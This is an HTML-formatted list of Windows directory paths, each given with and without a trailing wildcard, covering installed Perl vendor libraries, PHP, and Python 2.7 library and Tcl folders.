c:\Perl\perl\vendor\lib\Crypt\Random\*<br />
c:\Perl\perl\vendor\lib\Crypt\Random<br />
c:\Perl\perl\vendor\lib\Crypt\Random\Provider\*<br />
c:\Perl\perl\vendor\lib\Crypt\Random\Provider<br />
c:\Perl\perl\vendor\lib\Crypt\RIPEMD160\*<br />
c:\Perl\perl\vendor\lib\Crypt\RIPEMD160<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\ES\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\ES<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\Private\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\Private<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\Public\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\Key\Public<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\SS\*<br />
c:\Perl\perl\vendor\lib\Crypt\RSA\SS<br />
c:\Perl\perl\vendor\lib\Crypt\SSLeay\*<br />
c:\Perl\perl\vendor\lib\Crypt\SSLeay<br />
c:\Perl\perl\vendor\lib\Data\*<br />
c:\Perl\perl\vendor\lib\Data<br />
c:\Perl\perl\vendor\lib\Data\Compare\*<br />
c:\Perl\perl\vendor\lib\Data\Compare<br />
c:\Perl\perl\vendor\lib\Data\Compare\Plugins\*<br />
c:\Perl\perl\vendor\lib\Data\Compare\Plugins<br />
c:\Perl\perl\vendor\lib\Data\Compare\Plugins\Scalar\*<br />
c:\Perl\perl\vendor\lib\Data\Compare\Plugins\Scalar<br />
c:\Perl\perl\vendor\lib\Data\Random\*<br />
c:\Perl\perl\vendor\lib\Data\Random<br />
c:\Perl\perl\vendor\lib\DBD\*<br />
c:\Perl\perl\vendor\lib\DBD<br />
c:\Perl\perl\vendor\lib\DBD\ADO\*<br />
c:\Perl\perl\vendor\lib\DBD\ADO<br />
c:\Perl\perl\vendor\lib\DBD\File\*<br />
c:\Perl\perl\vendor\lib\DBD\File<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\*<br />
c:\Perl\perl\vendor\lib\DBD\Gofer<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\Policy\*<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\Policy<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\Transport\*<br />
c:\Perl\perl\vendor\lib\DBD\Gofer\Transport<br />
c:\Perl\perl\vendor\lib\DBD\mysql\*<br />
c:\Perl\perl\vendor\lib\DBD\mysql<br />
c:\Perl\perl\vendor\lib\DBD\ODBC\*<br />
c:\Perl\perl\vendor\lib\DBD\ODBC<br />
c:\Perl\perl\vendor\lib\DBD\SQLite\*<br />
c:\Perl\perl\vendor\lib\DBD\SQLite<br />
c:\Perl\perl\vendor\lib\DBI\*<br />
c:\Perl\perl\vendor\lib\DBI<br />
c:\Perl\perl\vendor\lib\DBI\Const\*<br />
c:\Perl\perl\vendor\lib\DBI\Const<br />
c:\Perl\perl\vendor\lib\DBI\Const\GetInfo\*<br />
c:\Perl\perl\vendor\lib\DBI\Const\GetInfo<br />
c:\Perl\perl\vendor\lib\DBI\DBD\*<br />
c:\Perl\perl\vendor\lib\DBI\DBD<br />
c:\Perl\perl\vendor\lib\DBI\DBD\SqlEngine\*<br />
c:\Perl\perl\vendor\lib\DBI\DBD\SqlEngine<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\*<br />
c:\Perl\perl\vendor\lib\DBI\Gofer<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\Serializer\*<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\Serializer<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\Transport\*<br />
c:\Perl\perl\vendor\lib\DBI\Gofer\Transport<br />
c:\Perl\perl\vendor\lib\DBI\ProfileDumper\*<br />
c:\Perl\perl\vendor\lib\DBI\ProfileDumper<br />
c:\Perl\perl\vendor\lib\DBI\SQL\*<br />
c:\Perl\perl\vendor\lib\DBI\SQL<br />
c:\Perl\perl\vendor\lib\DBI\Util\*<br />
c:\Perl\perl\vendor\lib\DBI\Util<br />
c:\Perl\perl\vendor\lib\DBIx\*<br />
c:\Perl\perl\vendor\lib\DBIx<br />
c:\Perl\perl\vendor\lib\DBIx\Simple\*<br />
c:\Perl\perl\vendor\lib\DBIx\Simple<br />
c:\Perl\perl\vendor\lib\DBIx\Simple\Result\*<br />
c:\Perl\perl\vendor\lib\DBIx\Simple\Result<br />
c:\Perl\perl\vendor\lib\DBM\*<br />
c:\Perl\perl\vendor\lib\DBM<br />
c:\Perl\perl\vendor\lib\DBM\Deep\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Engine\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Engine<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Iterator\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Iterator<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Iterator\File\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Iterator\File<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\DBI\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\DBI<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\File\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Sector\File<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Storage\*<br />
c:\Perl\perl\vendor\lib\DBM\Deep\Storage<br />
c:\Perl\perl\vendor\lib\Digest\*<br />
c:\Perl\perl\vendor\lib\Digest<br />
c:\Perl\perl\vendor\lib\File\*<br />
c:\Perl\perl\vendor\lib\File<br />
c:\Perl\perl\vendor\lib\File\Find\*<br />
c:\Perl\perl\vendor\lib\File\Find<br />
c:\Perl\perl\vendor\lib\File\Find\Rule\*<br />
c:\Perl\perl\vendor\lib\File\Find\Rule<br />
c:\Perl\perl\vendor\lib\File\HomeDir\*<br />
c:\Perl\perl\vendor\lib\File\HomeDir<br />
c:\Perl\perl\vendor\lib\File\HomeDir\Darwin\*<br />
c:\Perl\perl\vendor\lib\File\HomeDir\Darwin<br />
c:\Perl\perl\vendor\lib\GD\*<br />
c:\Perl\perl\vendor\lib\GD<br />
c:\Perl\perl\vendor\lib\HTML\*<br />
c:\Perl\perl\vendor\lib\HTML<br />
c:\Perl\perl\vendor\lib\HTTP\*<br />
c:\Perl\perl\vendor\lib\HTTP<br />
c:\Perl\perl\vendor\lib\HTTP\Cookies\*<br />
c:\Perl\perl\vendor\lib\HTTP\Cookies<br />
c:\Perl\perl\vendor\lib\HTTP\Headers\*<br />
c:\Perl\perl\vendor\lib\HTTP\Headers<br />
c:\Perl\perl\vendor\lib\HTTP\Request\*<br />
c:\Perl\perl\vendor\lib\HTTP\Request<br />
c:\Perl\perl\vendor\lib\Imager\*<br />
c:\Perl\perl\vendor\lib\Imager<br />
c:\Perl\perl\vendor\lib\Imager\Color\*<br />
c:\Perl\perl\vendor\lib\Imager\Color<br />
c:\Perl\perl\vendor\lib\Imager\Expr\*<br />
c:\Perl\perl\vendor\lib\Imager\Expr<br />
c:\Perl\perl\vendor\lib\Imager\File\*<br />
c:\Perl\perl\vendor\lib\Imager\File<br />
c:\Perl\perl\vendor\lib\Imager\Filter\*<br />
c:\Perl\perl\vendor\lib\Imager\Filter<br />
c:\Perl\perl\vendor\lib\Imager\Font\*<br />
c:\Perl\perl\vendor\lib\Imager\Font<br />
c:\Perl\perl\vendor\lib\Imager\include\*<br />
c:\Perl\perl\vendor\lib\Imager\include<br />
c:\Perl\perl\vendor\lib\IO\*<br />
c:\Perl\perl\vendor\lib\IO<br />
c:\Perl\perl\vendor\lib\IO\Compress\*<br />
c:\Perl\perl\vendor\lib\IO\Compress<br />
c:\Perl\perl\vendor\lib\IO\Compress\Adapter\*<br />
c:\Perl\perl\vendor\lib\IO\Compress\Adapter<br />
c:\Perl\perl\vendor\lib\IO\Socket\*<br />
c:\Perl\perl\vendor\lib\IO\Socket<br />
c:\Perl\perl\vendor\lib\IO\Uncompress\*<br />
c:\Perl\perl\vendor\lib\IO\Uncompress<br />
c:\Perl\perl\vendor\lib\IO\Uncompress\Adapter\*<br />
c:\Perl\perl\vendor\lib\IO\Uncompress\Adapter<br />
c:\Perl\perl\vendor\lib\IPC\*<br />
c:\Perl\perl\vendor\lib\IPC<br />
c:\Perl\perl\vendor\lib\IPC\Run3\*<br />
c:\Perl\perl\vendor\lib\IPC\Run3<br />
c:\Perl\perl\vendor\lib\IPC\System\*<br />
c:\Perl\perl\vendor\lib\IPC\System<br />
c:\Perl\perl\vendor\lib\JSON\*<br />
c:\Perl\perl\vendor\lib\JSON<br />
c:\Perl\perl\vendor\lib\JSON\backportPP\*<br />
c:\Perl\perl\vendor\lib\JSON\backportPP<br />
c:\Perl\perl\vendor\lib\JSON\PP\*<br />
c:\Perl\perl\vendor\lib\JSON\PP<br />
c:\Perl\perl\vendor\lib\JSON\XS\*<br />
c:\Perl\perl\vendor\lib\JSON\XS<br />
c:\Perl\perl\vendor\lib\lib\*<br />
c:\Perl\perl\vendor\lib\lib<br />
c:\Perl\perl\vendor\lib\lib\core\*<br />
c:\Perl\perl\vendor\lib\lib\core<br />
c:\Perl\perl\vendor\lib\local\*<br />
c:\Perl\perl\vendor\lib\local<br />
c:\Perl\perl\vendor\lib\LWP\*<br />
c:\Perl\perl\vendor\lib\LWP<br />
c:\Perl\perl\vendor\lib\LWP\Authen\*<br />
c:\Perl\perl\vendor\lib\LWP\Authen<br />
c:\Perl\perl\vendor\lib\LWP\Protocol\*<br />
c:\Perl\perl\vendor\lib\LWP\Protocol<br />
c:\Perl\perl\vendor\lib\Math\*<br />
c:\Perl\perl\vendor\lib\Math<br />
c:\Perl\perl\vendor\lib\Math\BigInt\*<br />
c:\Perl\perl\vendor\lib\Math\BigInt<br />
c:\Perl\perl\vendor\lib\Module\*<br />
c:\Perl\perl\vendor\lib\Module<br />
c:\Perl\perl\vendor\lib\Module\Plan\*<br />
c:\Perl\perl\vendor\lib\Module\Plan<br />
c:\Perl\perl\vendor\lib\Net\*<br />
c:\Perl\perl\vendor\lib\Net<br />
c:\Perl\perl\vendor\lib\Net\HTTP\*<br />
c:\Perl\perl\vendor\lib\Net\HTTP<br />
c:\Perl\perl\vendor\lib\Net\SMTP\*<br />
c:\Perl\perl\vendor\lib\Net\SMTP<br />
c:\Perl\perl\vendor\lib\Net\SSH2\*<br />
c:\Perl\perl\vendor\lib\Net\SSH2<br />
c:\Perl\perl\vendor\lib\Net\SSLeay\*<br />
c:\Perl\perl\vendor\lib\Net\SSLeay<br />
c:\Perl\perl\vendor\lib\Number\*<br />
c:\Perl\perl\vendor\lib\Number<br />
c:\Perl\perl\vendor\lib\PAR\*<br />
c:\Perl\perl\vendor\lib\PAR<br />
c:\Perl\perl\vendor\lib\PAR\Dist\*<br />
c:\Perl\perl\vendor\lib\PAR\Dist<br />
c:\Perl\perl\vendor\lib\PAR\Repository\*<br />
c:\Perl\perl\vendor\lib\PAR\Repository<br />
c:\Perl\perl\vendor\lib\PAR\Repository\Client\*<br />
c:\Perl\perl\vendor\lib\PAR\Repository\Client<br />
c:\Perl\perl\vendor\lib\Params\*<br />
c:\Perl\perl\vendor\lib\Params<br />
c:\Perl\perl\vendor\lib\Parse\*<br />
c:\Perl\perl\vendor\lib\Parse<br />
c:\Perl\perl\vendor\lib\Parse\Binary\*<br />
c:\Perl\perl\vendor\lib\Parse\Binary<br />
c:\Perl\perl\vendor\lib\Parse\Binary\FixedFormat\*<br />
c:\Perl\perl\vendor\lib\Parse\Binary\FixedFormat<br />
c:\Perl\perl\vendor\lib\Perl\*<br />
c:\Perl\perl\vendor\lib\Perl<br />
c:\Perl\perl\vendor\lib\POD2\*<br />
c:\Perl\perl\vendor\lib\POD2<br />
c:\Perl\perl\vendor\lib\POD2\DE\*<br />
c:\Perl\perl\vendor\lib\POD2\DE<br />
c:\Perl\perl\vendor\lib\POD2\DE\local\*<br />
c:\Perl\perl\vendor\lib\POD2\DE\local<br />
c:\Perl\perl\vendor\lib\POD2\PT_BR\*<br />
c:\Perl\perl\vendor\lib\POD2\PT_BR<br />
c:\Perl\perl\vendor\lib\POD2\PT_BR\local\*<br />
c:\Perl\perl\vendor\lib\POD2\PT_BR\local<br />
c:\Perl\perl\vendor\lib\PPM\*<br />
c:\Perl\perl\vendor\lib\PPM<br />
c:\Perl\perl\vendor\lib\PPM\XML\*<br />
c:\Perl\perl\vendor\lib\PPM\XML<br />
c:\Perl\perl\vendor\lib\Probe\*<br />
c:\Perl\perl\vendor\lib\Probe<br />
c:\Perl\perl\vendor\lib\SOAP\*<br />
c:\Perl\perl\vendor\lib\SOAP<br />
c:\Perl\perl\vendor\lib\SOAP\Lite\*<br />
c:\Perl\perl\vendor\lib\SOAP\Lite<br />
c:\Perl\perl\vendor\lib\SOAP\Lite\Deserializer\*<br />
c:\Perl\perl\vendor\lib\SOAP\Lite\Deserializer<br />
c:\Perl\perl\vendor\lib\SOAP\Transport\*<br />
c:\Perl\perl\vendor\lib\SOAP\Transport<br />
c:\Perl\perl\vendor\lib\Sort\*<br />
c:\Perl\perl\vendor\lib\Sort<br />
c:\Perl\perl\vendor\lib\String\*<br />
c:\Perl\perl\vendor\lib\String<br />
c:\Perl\perl\vendor\lib\Sub\*<br />
c:\Perl\perl\vendor\lib\Sub<br />
c:\Perl\perl\vendor\lib\Task\*<br />
c:\Perl\perl\vendor\lib\Task<br />
c:\Perl\perl\vendor\lib\Term\*<br />
c:\Perl\perl\vendor\lib\Term<br />
c:\Perl\perl\vendor\lib\Test\*<br />
c:\Perl\perl\vendor\lib\Test<br />
c:\Perl\perl\vendor\lib\Test\Deep\*<br />
c:\Perl\perl\vendor\lib\Test\Deep<br />
c:\Perl\perl\vendor\lib\Test\Deep\Cache\*<br />
c:\Perl\perl\vendor\lib\Test\Deep\Cache<br />
c:\Perl\perl\vendor\lib\Test\NoWarnings\*<br />
c:\Perl\perl\vendor\lib\Test\NoWarnings<br />
c:\Perl\perl\vendor\lib\Test\Tester\*<br />
c:\Perl\perl\vendor\lib\Test\Tester<br />
c:\Perl\perl\vendor\lib\Text\*<br />
c:\Perl\perl\vendor\lib\Text<br />
c:\Perl\perl\vendor\lib\Text\Diff\*<br />
c:\Perl\perl\vendor\lib\Text\Diff<br />
c:\Perl\perl\vendor\lib\Tie\*<br />
c:\Perl\perl\vendor\lib\Tie<br />
c:\Perl\perl\vendor\lib\Tree\*<br />
c:\Perl\perl\vendor\lib\Tree<br />
c:\Perl\perl\vendor\lib\UDDI\*<br />
c:\Perl\perl\vendor\lib\UDDI<br />
c:\Perl\perl\vendor\lib\URI\*<br />
c:\Perl\perl\vendor\lib\URI<br />
c:\Perl\perl\vendor\lib\URI\file\*<br />
c:\Perl\perl\vendor\lib\URI\file<br />
c:\Perl\perl\vendor\lib\URI\urn\*<br />
c:\Perl\perl\vendor\lib\URI\urn<br />
c:\Perl\perl\vendor\lib\Version\*<br />
c:\Perl\perl\vendor\lib\Version<br />
c:\Perl\perl\vendor\lib\Win32\*<br />
c:\Perl\perl\vendor\lib\Win32<br />
c:\Perl\perl\vendor\lib\Win32\API\*<br />
c:\Perl\perl\vendor\lib\Win32\API<br />
c:\Perl\perl\vendor\lib\Win32\Exe\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Manifest\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Manifest<br />
c:\Perl\perl\vendor\lib\Win32\Exe\PE\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\PE<br />
c:\Perl\perl\vendor\lib\Win32\Exe\PE\Header\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\PE\Header<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Resource\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Resource<br />
c:\Perl\perl\vendor\lib\Win32\Exe\ResourceEntry\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\ResourceEntry<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Section\*<br />
c:\Perl\perl\vendor\lib\Win32\Exe\Section<br />
c:\Perl\perl\vendor\lib\Win32\File\*<br />
c:\Perl\perl\vendor\lib\Win32\File<br />
c:\Perl\perl\vendor\lib\Win32\OLE\*<br />
c:\Perl\perl\vendor\lib\Win32\OLE<br />
c:\Perl\perl\vendor\lib\Win32API\*<br />
c:\Perl\perl\vendor\lib\Win32API<br />
c:\Perl\perl\vendor\lib\Win32API\Registry\*<br />
c:\Perl\perl\vendor\lib\Win32API\Registry<br />
c:\Perl\perl\vendor\lib\WWW\*<br />
c:\Perl\perl\vendor\lib\WWW<br />
c:\Perl\perl\vendor\lib\WWW\RobotRules\*<br />
c:\Perl\perl\vendor\lib\WWW\RobotRules<br />
c:\Perl\perl\vendor\lib\XML\*<br />
c:\Perl\perl\vendor\lib\XML<br />
c:\Perl\perl\vendor\lib\XML\LibXML\*<br />
c:\Perl\perl\vendor\lib\XML\LibXML<br />
c:\Perl\perl\vendor\lib\XML\LibXML\SAX\*<br />
c:\Perl\perl\vendor\lib\XML\LibXML\SAX<br />
c:\Perl\perl\vendor\lib\XML\Parser\*<br />
c:\Perl\perl\vendor\lib\XML\Parser<br />
c:\Perl\perl\vendor\lib\XML\Parser\Encodings\*<br />
c:\Perl\perl\vendor\lib\XML\Parser\Encodings<br />
c:\Perl\perl\vendor\lib\XML\Parser\Style\*<br />
c:\Perl\perl\vendor\lib\XML\Parser\Style<br />
c:\Perl\perl\vendor\lib\XML\SAX\*<br />
c:\Perl\perl\vendor\lib\XML\SAX<br />
c:\Perl\perl\vendor\lib\XML\SAX\PurePerl\*<br />
c:\Perl\perl\vendor\lib\XML\SAX\PurePerl<br />
c:\Perl\perl\vendor\lib\XML\SAX\PurePerl\Reader\*<br />
c:\Perl\perl\vendor\lib\XML\SAX\PurePerl\Reader<br />
c:\Perl\perl\vendor\lib\XML\Simple\*<br />
c:\Perl\perl\vendor\lib\XML\Simple<br />
c:\Perl\perl\vendor\lib\XMLRPC\*<br />
c:\Perl\perl\vendor\lib\XMLRPC<br />
c:\Perl\perl\vendor\lib\XMLRPC\Transport\*<br />
c:\Perl\perl\vendor\lib\XMLRPC\Transport<br />
c:\Perl\perl\vendor\lib\YAML\*<br />
c:\Perl\perl\vendor\lib\YAML<br />
c:\Perl\perl\vendor\lib\YAML\Dumper\*<br />
c:\Perl\perl\vendor\lib\YAML\Dumper<br />
c:\Perl\perl\vendor\lib\YAML\Loader\*<br />
c:\Perl\perl\vendor\lib\YAML\Loader<br />
c:\Perl\ppm\*<br />
c:\Perl\ppm<br />
c:\Perl\win32\*<br />
c:\Perl\win32<br />
c:\PHP\*<br />
c:\PHP<br />
c:\PHP\dev\*<br />
c:\PHP\dev<br />
c:\PHP\ext\*<br />
c:\PHP\ext<br />
c:\Python27\*<br />
c:\Python27<br />
c:\Python27\DLLs\*<br />
c:\Python27\DLLs<br />
c:\Python27\Doc\*<br />
c:\Python27\Doc<br />
c:\Python27\include\*<br />
c:\Python27\include<br />
c:\Python27\Lib\*<br />
c:\Python27\Lib<br />
c:\Python27\Lib\bsddb\*<br />
c:\Python27\Lib\bsddb<br />
c:\Python27\Lib\bsddb\test\*<br />
c:\Python27\Lib\bsddb\test<br />
c:\Python27\Lib\compiler\*<br />
c:\Python27\Lib\compiler<br />
c:\Python27\Lib\ctypes\*<br />
c:\Python27\Lib\ctypes<br />
c:\Python27\Lib\ctypes\macholib\*<br />
c:\Python27\Lib\ctypes\macholib<br />
c:\Python27\Lib\ctypes\test\*<br />
c:\Python27\Lib\ctypes\test<br />
c:\Python27\Lib\curses\*<br />
c:\Python27\Lib\curses<br />
c:\Python27\Lib\distutils\*<br />
c:\Python27\Lib\distutils<br />
c:\Python27\Lib\distutils\command\*<br />
c:\Python27\Lib\distutils\command<br />
c:\Python27\Lib\distutils\tests\*<br />
c:\Python27\Lib\distutils\tests<br />
c:\Python27\Lib\email\*<br />
c:\Python27\Lib\email<br />
c:\Python27\Lib\email\mime\*<br />
c:\Python27\Lib\email\mime<br />
c:\Python27\Lib\email\test\*<br />
c:\Python27\Lib\email\test<br />
c:\Python27\Lib\email\test\data\*<br />
c:\Python27\Lib\email\test\data<br />
c:\Python27\Lib\encodings\*<br />
c:\Python27\Lib\encodings<br />
c:\Python27\Lib\hotshot\*<br />
c:\Python27\Lib\hotshot<br />
c:\Python27\Lib\idlelib\*<br />
c:\Python27\Lib\idlelib<br />
c:\Python27\Lib\idlelib\Icons\*<br />
c:\Python27\Lib\idlelib\Icons<br />
c:\Python27\Lib\importlib\*<br />
c:\Python27\Lib\importlib<br />
c:\Python27\Lib\json\*<br />
c:\Python27\Lib\json<br />
c:\Python27\Lib\json\tests\*<br />
c:\Python27\Lib\json\tests<br />
c:\Python27\Lib\lib-tk\*<br />
c:\Python27\Lib\lib-tk<br />
c:\Python27\Lib\lib-tk\test\*<br />
c:\Python27\Lib\lib-tk\test<br />
c:\Python27\Lib\lib-tk\test\test_tkinter\*<br />
c:\Python27\Lib\lib-tk\test\test_tkinter<br />
c:\Python27\Lib\lib-tk\test\test_ttk\*<br />
c:\Python27\Lib\lib-tk\test\test_ttk<br />
c:\Python27\Lib\lib2to3\*<br />
c:\Python27\Lib\lib2to3<br />
c:\Python27\Lib\lib2to3\fixes\*<br />
c:\Python27\Lib\lib2to3\fixes<br />
c:\Python27\Lib\lib2to3\pgen2\*<br />
c:\Python27\Lib\lib2to3\pgen2<br />
c:\Python27\Lib\lib2to3\tests\*<br />
c:\Python27\Lib\lib2to3\tests<br />
c:\Python27\Lib\lib2to3\tests\data\*<br />
c:\Python27\Lib\lib2to3\tests\data<br />
c:\Python27\Lib\lib2to3\tests\data\fixers\*<br />
c:\Python27\Lib\lib2to3\tests\data\fixers<br />
c:\Python27\Lib\lib2to3\tests\data\fixers\myfixes\*<br />
c:\Python27\Lib\lib2to3\tests\data\fixers\myfixes<br />
c:\Python27\Lib\logging\*<br />
c:\Python27\Lib\logging<br />
c:\Python27\Lib\msilib\*<br />
c:\Python27\Lib\msilib<br />
c:\Python27\Lib\multiprocessing\*<br />
c:\Python27\Lib\multiprocessing<br />
c:\Python27\Lib\multiprocessing\dummy\*<br />
c:\Python27\Lib\multiprocessing\dummy<br />
c:\Python27\Lib\pydoc_data\*<br />
c:\Python27\Lib\pydoc_data<br />
c:\Python27\Lib\site-packages\*<br />
c:\Python27\Lib\site-packages<br />
c:\Python27\Lib\site-packages\distorm3\*<br />
c:\Python27\Lib\site-packages\distorm3<br />
c:\Python27\Lib\site-packages\PIL\*<br />
c:\Python27\Lib\site-packages\PIL<br />
c:\Python27\Lib\site-packages\winappdbg\*<br />
c:\Python27\Lib\site-packages\winappdbg<br />
c:\Python27\Lib\site-packages\winappdbg\win32\*<br />
c:\Python27\Lib\site-packages\winappdbg\win32<br />
c:\Python27\Lib\sqlite3\*<br />
c:\Python27\Lib\sqlite3<br />
c:\Python27\Lib\sqlite3\test\*<br />
c:\Python27\Lib\sqlite3\test<br />
c:\Python27\Lib\test\*<br />
c:\Python27\Lib\test<br />
c:\Python27\Lib\test\cjkencodings\*<br />
c:\Python27\Lib\test\cjkencodings<br />
c:\Python27\Lib\test\crashers\*<br />
c:\Python27\Lib\test\crashers<br />
c:\Python27\Lib\test\decimaltestdata\*<br />
c:\Python27\Lib\test\decimaltestdata<br />
c:\Python27\Lib\test\leakers\*<br />
c:\Python27\Lib\test\leakers<br />
c:\Python27\Lib\test\subprocessdata\*<br />
c:\Python27\Lib\test\subprocessdata<br />
c:\Python27\Lib\test\tracedmodules\*<br />
c:\Python27\Lib\test\tracedmodules<br />
c:\Python27\Lib\test\xmltestdata\*<br />
c:\Python27\Lib\test\xmltestdata<br />
c:\Python27\Lib\unittest\*<br />
c:\Python27\Lib\unittest<br />
c:\Python27\Lib\unittest\test\*<br />
c:\Python27\Lib\unittest\test<br />
c:\Python27\Lib\wsgiref\*<br />
c:\Python27\Lib\wsgiref<br />
c:\Python27\Lib\xml\*<br />
c:\Python27\Lib\xml<br />
c:\Python27\Lib\xml\dom\*<br />
c:\Python27\Lib\xml\dom<br />
c:\Python27\Lib\xml\etree\*<br />
c:\Python27\Lib\xml\etree<br />
c:\Python27\Lib\xml\parsers\*<br />
c:\Python27\Lib\xml\parsers<br />
c:\Python27\Lib\xml\sax\*<br />
c:\Python27\Lib\xml\sax<br />
c:\Python27\libs\*<br />
c:\Python27\libs<br />
c:\Python27\Scripts\*<br />
c:\Python27\Scripts<br />
c:\Python27\tcl\*<br />
c:\Python27\tcl<br />
c:\Python27\tcl\dde1.3\*<br />
c:\Python27\tcl\dde1.3<br />
c:\Python27\tcl\reg1.2\*<br />
c:\Python27\tcl\reg1.2<br />
c:\Python27\tcl\tcl8\*<br />
c:\Python27\tcl\tcl8<br />
c:\Python27\tcl\tcl8\8.4\*<br />
c:\Python27\tcl\tcl8\8.4<br />
c:\Python27\tcl\tcl8\8.4\platform\*<br />
c:\Python27\tcl\tcl8\8.4\platform<br />
c:\Python27\tcl\tcl8\8.5\*<br />
c:\Python27\tcl\tcl8\8.5<br />
c:\Python27\tcl\tcl8.5\*<br />
c:\Python27\tcl\tcl8.5<br />
c:\Python27\tcl\tcl8.5\encoding\*<br />
c:\Python27\tcl\tcl8.5\encoding<br />
c:\Python27\tcl\tcl8.5\http1.0\*<br />
c:\Python27\tcl\tcl8.5\http1.0<br />
c:\Python27\tcl\tcl8.5\msgs\*<br />
c:\Python27\tcl\tcl8.5\msgs<br />
c:\Python27\tcl\tcl8.5\opt0.4\*<br />
c:\Python27\tcl\tcl8.5\opt0.4<br />
c:\Python27\tcl\tcl8.5\tzdata\*<br />
c:\Python27\tcl\tcl8.5\tzdata<br />
c:\Python27\tcl\tcl8.5\tzdata\Africa\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Africa<br />
c:\Python27\tcl\tcl8.5\tzdata\America\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Argentina\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Argentina<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Indiana\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Indiana<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Kentucky\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America\Kentucky<br />
c:\Python27\tcl\tcl8.5\tzdata\America\North_Dakota\*<br />
c:\Python27\tcl\tcl8.5\tzdata\America\North_Dakota<br />
c:\Python27\tcl\tcl8.5\tzdata\Antarctica\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Antarctica<br />
c:\Python27\tcl\tcl8.5\tzdata\Arctic\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Arctic<br />
c:\Python27\tcl\tcl8.5\tzdata\Asia\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Asia<br />
c:\Python27\tcl\tcl8.5\tzdata\Atlantic\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Atlantic<br />
c:\Python27\tcl\tcl8.5\tzdata\Australia\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Australia<br />
c:\Python27\tcl\tcl8.5\tzdata\Brazil\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Brazil<br />
c:\Python27\tcl\tcl8.5\tzdata\Canada\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Canada<br />
c:\Python27\tcl\tcl8.5\tzdata\Chile\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Chile<br />
c:\Python27\tcl\tcl8.5\tzdata\Etc\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Etc<br />
c:\Python27\tcl\tcl8.5\tzdata\Europe\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Europe<br />
c:\Python27\tcl\tcl8.5\tzdata\Indian\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Indian<br />
c:\Python27\tcl\tcl8.5\tzdata\Mexico\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Mexico<br />
c:\Python27\tcl\tcl8.5\tzdata\Pacific\*<br />
c:\Python27\tcl\tcl8.5\tzdata\Pacific<br />
c:\Python27\tcl\tcl8.5\tzdata\SystemV\*<br />
c:\Python27\tcl\tcl8.5\tzdata\SystemV<br />
c:\Python27\tcl\tcl8.5\tzdata\US\*<br />
c:\Python27\tcl\tcl8.5\tzdata\US<br />
c:\Python27\tcl\tix8.4.3\*<br />
c:\Python27\tcl\tix8.4.3<br />
c:\Python27\tcl\tix8.4.3\bitmaps\*<br />
c:\Python27\tcl\tix8.4.3\bitmaps<br />
c:\Python27\tcl\tix8.4.3\demos\*<br />
c:\Python27\tcl\tix8.4.3\demos<br />
c:\Python27\tcl\tix8.4.3\demos\bitmaps\*<br />
c:\Python27\tcl\tix8.4.3\demos\bitmaps<br />
c:\Python27\tcl\tix8.4.3\demos\samples\*<br />
c:\Python27\tcl\tix8.4.3\demos\samples<br />
c:\Python27\tcl\tix8.4.3\pref\*<br />
c:\Python27\tcl\tix8.4.3\pref<br />
c:\Python27\tcl\tk8.5\*<br />
c:\Python27\tcl\tk8.5<br />
c:\Python27\tcl\tk8.5\demos\*<br />
c:\Python27\tcl\tk8.5\demos<br />
c:\Python27\tcl\tk8.5\demos\images\*<br />
